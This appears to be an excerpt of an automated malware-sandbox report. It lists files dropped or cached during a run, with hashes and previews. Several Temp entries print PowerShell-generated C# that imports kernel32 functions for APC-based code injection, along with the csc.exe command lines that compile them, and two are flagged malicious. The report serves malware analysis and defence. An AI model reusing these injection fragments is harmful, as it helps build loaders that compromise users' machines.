                                                                                                                                      Preview: qrKLV7cX9FFkSZiLVGD0AujmwUS0lszsgRtLkJXbDnMxZEbQcLEMZP9AENVbi5t1P6FM9USacZ/3BMQZkHB9hoDeH08G+UQzLtWGW/dkh4vuAVlR5/L8jals82A4PsE+4rYf+6rtVVm/Ykx2kj7O4ExT5YR4wyNPx7I4rr3mAbTFDjbluYNOJjH2L0jSLyplHmE13dMJWnh23P8iX+1PV0O8nA+g4rKMGsDk17cg7Mpm2+KENW0D7aP656j+zDi4XuEwLHoKHQCMmRLzjMYa+JlQWVcojKBWJow3YO3mh4st36teMmuq7CDN0CS+UzlOCwwGLAPkNcJ5So/uRvN2b7/LAHSZ7Nz8Hyl7qLNsBFoB3AxyDWGiN35FSvAUhliKGuiWH0g+Uq2FYkTkrbjyAw50GGl7jm0NsxSNJ9QLXS2VAsJrevbFGPXTxKE5L83E5Ro75Rmw8q4M5wV2mXErc8nR+ie6oWM2B5R1ZYnhKQBcnjdp65o5Ah7KmVYWPIRfpMYWVJcafkmS8cMatpOMwp5suS4CRPoZNFUnE6lrxL61N5dBLj6RuExp5V+asqnE7A5QmA/n18LGvj6qjxKPgE65id9rxkKgba5f54YY/lYDhIP6nLfYq5xV468uVBen9rzpUXeDv3Um63c1dVJgUgTRj7BKojuJjAMrmUAa5ksECw1w7bApTFxWNccAv5sduNu6+3wyS8oHmYqNgO8gIiec04H8HnK01LGhw9SoiTerEn3c6Vu9kh40fFb/b9SR0bc/4IUDWPVDnOECj6ydXpuAL7r6b1IranAdntHu+1pUi2rpGUW9SiR6Kcw0ct5qfTyCu/13Sz4O+B1J9bC4XnrOS/Pn9doI6NQM7JdupPSfQtqo1U2FIoki0yu26nOY3p4SQAXzH+hLw69CTMH3KIRtxt92Bo/X+oktP5kOorL7VwMtzq9r5bmY3JR9uHDFnlkMFBny2+WTnyrdCZQn3m45DUQB5mTGMtL1f8Y+
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\http_404[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:HTML document, UTF-8 Unicode (with BOM) text, with very long lines, with CRLF line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):6495
                                                                                                                                      Entropy (8bit):3.8998802417135856
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:up4d0yV4VkBXvLutC5N9J/1a5TI7kZ3GUXn3GFa7K083GJehBu01kptk7KwyBwpM:uKp6yN9JaKktZX36a7x05hwW7RM
                                                                                                                                      MD5:F65C729DC2D457B7A1093813F1253192
                                                                                                                                      SHA1:5006C9B50108CF582BE308411B157574E5A893FC
                                                                                                                                      SHA-256:B82BFB6FA37FD5D56AC7C00536F150C0F244C81F1FC2D4FEFBBDC5E175C71B4F
                                                                                                                                      SHA-512:717AFF18F105F342103D36270D642CC17BD9921FF0DBC87E3E3C2D897F490F4ECFAB29CF998D6D99C4951C3EABB356FE759C3483A33704CE9FCC1F546EBCBBC7
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/http_404.htm
                                                                                                                                      Preview: .<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">....<html dir="ltr">.... <head>.. <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css">.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.... <title>HTTP 404 Not Found</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:initHomepage(); expandCollapse('infoBlockID', true); initGoBack(); initMoreInfo('infoBlockID');">.... <table width="730" cellpadding="0" cellspacing="0" border="0">.... Error title -->.. <tr>.. <td id="infoIconAlign" width="60" align="left" valign="top" rowspan="2">.. <img src="info_48.png" id="infoIcon" alt="Info icon">..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\info_48[1]
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:PNG image data, 47 x 48, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):4113
                                                                                                                                      Entropy (8bit):7.9370830126943375
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:96:WNTJL8szf79M8FUjE39KJoUUuJPnvmKacs6Uq7qDMj1XPL:WNrzFoQSJPnvzs6rL
                                                                                                                                      MD5:5565250FCC163AA3A79F0B746416CE69
                                                                                                                                      SHA1:B97CC66471FCDEE07D0EE36C7FB03F342C231F8F
                                                                                                                                      SHA-256:51129C6C98A82EA491F89857C31146ECEC14C4AF184517450A7A20C699C84859
                                                                                                                                      SHA-512:E60EA153B0FECE4D311769391D3B763B14B9A140105A36A13DAD23C2906735EAAB9092236DEB8C68EF078E8864D6E288BEF7EF1731C1E9F1AD9B0170B95AC134
                                                                                                                                      Malicious:false
                                                                                                                                      IE Cache URL:res://ieframe.dll/info_48.png
                                                                                                                                      Preview: .PNG........IHDR.../...0.......#.....IDATx^...pUU..{....KB........!....F......jp.Q.......Vg.F..m.Q....{...,m.@.56D...&$d!.<..}....s..K9.....{............[./<..T..I.I..JR)).9.k.N.%.E.W^}....Po..............X..;.=.P......./...+...9./..s.....9..|.......*.7v.`..V.....-^.$S[[[......K..z......3..3....5 ...0.."/n/.c...&.{.ht..?....A..I{.n.....|....t......N}..%.v...:.E..i....`....a.k.mg.LX..fcFU.fO-..YEfd.}...~."......}l$....^.re..'^X..*}.?.^U.G..... .30...X......f[.l0.P`..KC...[..[..6....~..i..Q.|;x..T ..........s.5...n+.0..;...H#.2..#.M..m[^3x&E.Ya..\K..{[..M..g...yf0..~....M.]7..ZZZ:..a.O.G64]....9..l[..a....N,,.h......5...f*.y...}...BX{.G^...?.c.......s^..P.(..G...t.0.:.X.DCs.....]vf...py).........x..>-..Be.a...G...Y!...z...g.{....d.s.o.....%.x......R.W.....Z.b,....!..6Ub....U.qY(/v..m.a...4.`Qr\.E.G..a)..t..e.j.W........C<.1.....c..l1w....]3%....tR;.,..3..-.NW.5...t..H..h..D..b......M....)B..2J...)..o..m..M.t....wn./....+Wv....xkg..*..
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):11606
                                                                                                                                      Entropy (8bit):4.883977562702998
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
                                                                                                                                      MD5:1F1446CE05A385817C3EF20CBD8B6E6A
                                                                                                                                      SHA1:1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
                                                                                                                                      SHA-256:2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
                                                                                                                                      SHA-512:252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):64
                                                                                                                                      Entropy (8bit):0.9260988789684415
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:Nlllulb/lj:NllUb/l
                                                                                                                                      MD5:13AF6BE1CB30E2FB779EA728EE0A6D67
                                                                                                                                      SHA1:F33581AC2C60B1F02C978D14DC220DCE57CC9562
                                                                                                                                      SHA-256:168561FB18F8EBA8043FA9FC4B8A95B628F2CF5584E5A3B96C9EBAF6DD740E3F
                                                                                                                                      SHA-512:1159E1087BC7F7CBB233540B61F1BDECB161FF6C65AD1EFC9911E87B8E4B2E5F8C2AF56D67B33BC1F6836106D3FEA8C750CC24B9F451ACF85661E0715B829413
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: @...e................................................@..........
                                                                                                                                      C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.0.cs
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):402
                                                                                                                                      Entropy (8bit):5.038590946267481
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:V/DsYLDS81zuJeMRSR7a1ehk1wJveJSSRa+rVSSRnA/fuHo8zy:V/DTLDfuC3jJWv9rV5nA/2IAy
                                                                                                                                      MD5:D318CFA6F0AA6A796C421A261F345F96
                                                                                                                                      SHA1:8CC7A3E861751CD586D810AB0747F9C909E7F051
                                                                                                                                      SHA-256:F0AC8098FC8D2D55052F4EA57D9B57E17A7BF211C3B51F261C8194CECB6007E2
                                                                                                                                      SHA-512:10EB4A6982093BE06F7B4C15F2898F0C7645ECD7EFA64195A9940778BCDE81CF54139B3A65A1584025948E87C37FAF699BE0B4EB5D6DFAEC41CDCC25E0E7BDA8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class tba. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr muapoay,IntPtr ownmggmyjwj,IntPtr blggfu);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint uxd,uint egqs,IntPtr yobweqmfam);.. }..}.
                                                                                                                                      C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):369
                                                                                                                                      Entropy (8bit):5.313360961388429
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23fe0Uzxs7+AEszIWXp+N23feSn:p37Lvkmb6KHqWZE8Pn
                                                                                                                                      MD5:2DB8879E193202C9BF2E53E6BFED2AA0
                                                                                                                                      SHA1:B70B1517052DE8E7C4936A6032542D18B2000AA0
                                                                                                                                      SHA-256:01A4228FF2F9F3B587C24468C7F3EE08DC64259C9BDC1E4FA0AD35F6BBDAB4B9
                                                                                                                                      SHA-512:495DF850BFE8CEB6CED15B037F6571F0CCBCB5B5EB3F21C2F40F3D7EE1F213CDD0BFC58E86AC054987284756E5765B4321DDDB1B71D7E4C177B27A263F6CA87B
                                                                                                                                      Malicious:true
                                                                                                                                      Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.0.cs"
                                                                                                                                      C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.dll
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3584
                                                                                                                                      Entropy (8bit):2.6201282755446322
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:etGSpW/W2Dg85xL/XsB4zJL4zqhRqPPtkZfGmNn+II+ycuZhNHakSpPNnq:6xWb5xL/OGbuuJlRn1ulHa3Lq
                                                                                                                                      MD5:A5F27D62E9CA8D216BD8677A014C1E9F
                                                                                                                                      SHA1:48745A1788FDCCBF3BE6F7BEC72A926A28E1CA99
                                                                                                                                      SHA-256:623AB8A49F0ED911BF70DA44A71F47EBB1BDCE091A80B4C77EB25E60337D7451
                                                                                                                                      SHA-512:E1849B68778B01881F8E4246BEDC113CBA95F483C0C9F38EA713F31635CA121515F65939B2D38DD0316DF44E9BED84C20B293CA351411042B1D455080A2F13D8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....._...........!.................#... ...@....... ....................................@..................................#..K....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....*BSJB............v4.0.30319......l...H...#~......8...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................/.(...................................................... 6............ C............ V.....P ......a.........g.....o.....{.....................a. ...a...!.a.%...a.......*.....3./.....6.......C.......V................................................<Module>.1453igkk.dll.tba.W32.mscorlib.Syst
                                                                                                                                      C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.out
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):412
                                                                                                                                      Entropy (8bit):4.871364761010112
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
                                                                                                                                      MD5:83B3C9D9190CE2C57B83EEE13A9719DF
                                                                                                                                      SHA1:ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
                                                                                                                                      SHA-256:B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
                                                                                                                                      SHA-512:0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                                                                                      C:\Users\user\AppData\Local\Temp\1453igkk\CSCD2500265572748DEA3D91E508E5342FB.TMP
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      File Type:MSVC .res
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):652
                                                                                                                                      Entropy (8bit):3.1156819456479257
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryKfnGak7YnqqhfnXPN5Dlq5J:+RI+ycuZhNHakSpPNnqX
                                                                                                                                      MD5:52FBC8B242036E953D34FB77648B8CA7
                                                                                                                                      SHA1:44B9D1FABA6237FD3EC21C1CB5EA552BE904EB25
                                                                                                                                      SHA-256:A414B782A372D8D104F08A38DD596DA5D4F2A1A2E251EB596000D28CB6A808E2
                                                                                                                                      SHA-512:8C43DDC7C1A66790678DF83E8CC41C6DB731FFFB15EC5AD4F2DB0708DCF60D81B23853A04A0690D5B66D2F8212D8C9D280DD585DFCEC0C94ADDC165C3CF8EAB7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...1.4.5.3.i.g.k.k...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...1.4.5.3.i.g.k.k...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                      C:\Users\user\AppData\Local\Temp\JavaDeployReg.log
                                                                                                                                      Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                      File Type:ASCII text, with CRLF line terminators
                                                                                                                                      Category:modified
                                                                                                                                      Size (bytes):89
                                                                                                                                      Entropy (8bit):4.214875319651327
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:oVXVPMfFfVQLU0qmW8JOGXnFPMfFfVQLU0Zun:o9QF9QLU0iqgF9QLU0Zu
                                                                                                                                      MD5:C761F30D7AA0B615632114F8048E36F6
                                                                                                                                      SHA1:0654CFC40DA2F1F93E8EF23E8E5BEF11ADC3FF8B
                                                                                                                                      SHA-256:429DF2245415C117E29A61D8C318D5A8037D13458A0A326208BF1058A2FB91CB
                                                                                                                                      SHA-512:1218CDFA05793495D3D26EBFBFBF759347DD4A4EC9E4660AD93262AE24D1913C583FBB0C0D7A51F6C0FCD6BD98474181F6E1847A1E577478FDBCB41320C21A03
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: [2020/11/24 21:20:05.162] Latest deploy version: ..[2020/11/24 21:20:05.162] 11.211.2 ..
                                                                                                                                      C:\Users\user\AppData\Local\Temp\RES8664.tmp
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2184
                                                                                                                                      Entropy (8bit):2.70956465433161
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:pgKLhHdVFhKdNNI+ycuZhNHakSpPNnq9qpnie9Ep:KK19VzKd31ulHa3Lq9uw
                                                                                                                                      MD5:F312FDCCB14F8E901F73C2077C51793C
                                                                                                                                      SHA1:18ADB28339D8CE374944AD74AC42447CF8595A02
                                                                                                                                      SHA-256:07DE661EE9480141E11DC5B82CC0B16B6D632C83B8FB583C4879CAA09ACACA42
                                                                                                                                      SHA-512:AB124BEA9705D985F3E573F8DC6C56DF6F3F88A2C4FE2F007022596498BC2C7EDF297DA91628EC7190EB9A27902BEE86F932226756048EF5CB8F087B75FC6BE0
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ........T....c:\Users\user\AppData\Local\Temp\1453igkk\CSCD2500265572748DEA3D91E508E5342FB.TMP...............R..B.n.=4.wd.............4.......C:\Users\user\AppData\Local\Temp\RES8664.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\RES9384.tmp
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2184
                                                                                                                                      Entropy (8bit):2.7068645236556512
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:bP6eRhHlhKdNNI+ycuZhNvuakScvPNnq9qpuhie9Ep:bPXDzKd31ulma3Sq93hw
                                                                                                                                      MD5:E50A6C8BC0F94622EB97ABF57EF8D1C6
                                                                                                                                      SHA1:F5735A7C74B6CF1930CB6AF6F7FCC01EF275121D
                                                                                                                                      SHA-256:D18B307D5E7E38D78D1C0D868BEF19307AA4D60CDB225537773D740C8E1AC4A1
                                                                                                                                      SHA-512:EFD48BEE39D7279CCDEBB0E867740D75D99A9053403E261A99C21FBA55F77BAC42618412F08C103A0A6C40685193EFCD5BA241035B3CB7F045CA30FB684A84F7
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ........S....c:\Users\user\AppData\Local\Temp\jery0dbp\CSCF9697DD756E45B2A9442C531AA1339A.TMP..................g..O....r..............4.......C:\Users\user\AppData\Local\Temp\RES9384.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pvnvbiu0.gck.ps1
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1
                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: 1
                                                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_z5u3jvqp.syn.psm1
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1
                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:3:U:U
                                                                                                                                      MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                                                      SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                                                      SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                                                      SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: 1
                                                                                                                                      C:\Users\user\AppData\Local\Temp\jery0dbp\CSCF9697DD756E45B2A9442C531AA1339A.TMP
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      File Type:MSVC .res
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):652
                                                                                                                                      Entropy (8bit):3.0849692938644355
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grytuak7YnqqcvPN5Dlq5J:+RI+ycuZhNvuakScvPNnqX
                                                                                                                                      MD5:94D1679D1D4FEFD1EF2E72D0E7ABF5B2
                                                                                                                                      SHA1:AAC4640124B24ED06E8D7588C04AFCC9F534D707
                                                                                                                                      SHA-256:4C6512C3975A9BC03A4D0D45FF7274B75EFA247D42475BA3252FC6C288290AD5
                                                                                                                                      SHA-512:FDA5BB5791C6634031BA7E0C3D6A98880059302323DFE0F0E3F973599C14789D7BBAE662A58E357704504C9CBAE38F429B2310AAC2332AFDEA51E7344AE4C09C
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: .... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...j.e.r.y.0.d.b.p...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...j.e.r.y.0.d.b.p...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                                      C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.0.cs
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):414
                                                                                                                                      Entropy (8bit):5.000775845755204
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:V/DsYLDS81zuJ0VMRSRa+eNMjSSRr5DyBSRHq10iwHRfKFKDDVWQy:V/DTLDfue9eg5r5Xu0zH5rgQy
                                                                                                                                      MD5:216105852331C904BA5D540DE538DD4E
                                                                                                                                      SHA1:EE80274EBF645987E942277F7E0DE23B51011752
                                                                                                                                      SHA-256:408944434D89B94CE4EB33DD507CA4E0283419FA39E016A5E26F2C827825DDCC
                                                                                                                                      SHA-512:602208E375BCD655A21B2FC471C44892E26CA5BE9208B7C8EB431E27D3AAE5079A98DFFE3884A7FF9E46B24FFFC0F696CD468F09E57008A5EB5E8C4C93410B41
                                                                                                                                      Malicious:true
                                                                                                                                      Preview: .using System;.using System.Runtime.InteropServices;..namespace W32.{. public class mme. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint bxtqajkpwb,uint ytemv);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr nlosdxjodm,IntPtr mvqodpevph,uint tnvcegcf,uint dbt,uint egycoak);.. }..}.
                                                                                                                                      C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline
                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                      File Type:UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):369
                                                                                                                                      Entropy (8bit):5.236555817911529
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2WXp+N23f7ozxs7+AEszIWXp+N23f76An:p37Lvkmb6KHToWZE8Tl
                                                                                                                                      MD5:9EA6B9D595456E5B23DEA4B11806F78F
                                                                                                                                      SHA1:C4487B9542B629D31FC73B8CADD37D6C4CDA53D1
                                                                                                                                      SHA-256:D85066A82597D6622DE17EEC3E20F97C87204B48220F99A7B19899C0B663A34E
                                                                                                                                      SHA-512:9D85F4C83ECA80E0BE1FB57842CB3E8FD85362ED3592850316B73F41BA7C018F0A5E7A62B08A3ACADEC7B29F2BEC2AF55C09D16F70333D6907E4EB441CBE5BA5
                                                                                                                                      Malicious:false
                                                                                                                                      Preview: ./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.0.cs"
                                                                                                                                      C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.dll
                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):3584
                                                                                                                                      Entropy (8bit):2.6244385522478124
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:6AW7qMTxzJUyNjWQYwSJbYgH1ulma3Sq:SqYxAgWT44K
                                                                                                                                      MD5:9E447BB5EA9933E1D20CB71DC2AC790A
                                                                                                                                      SHA1:C1D58647C580554A60A6027018CEE3C39143C2EE
                                                                                                                                      SHA-256:BA93835763E0E4FB5CFD4E71738E1E8205ED15F550E6E72848FFC8B9D7617FF9
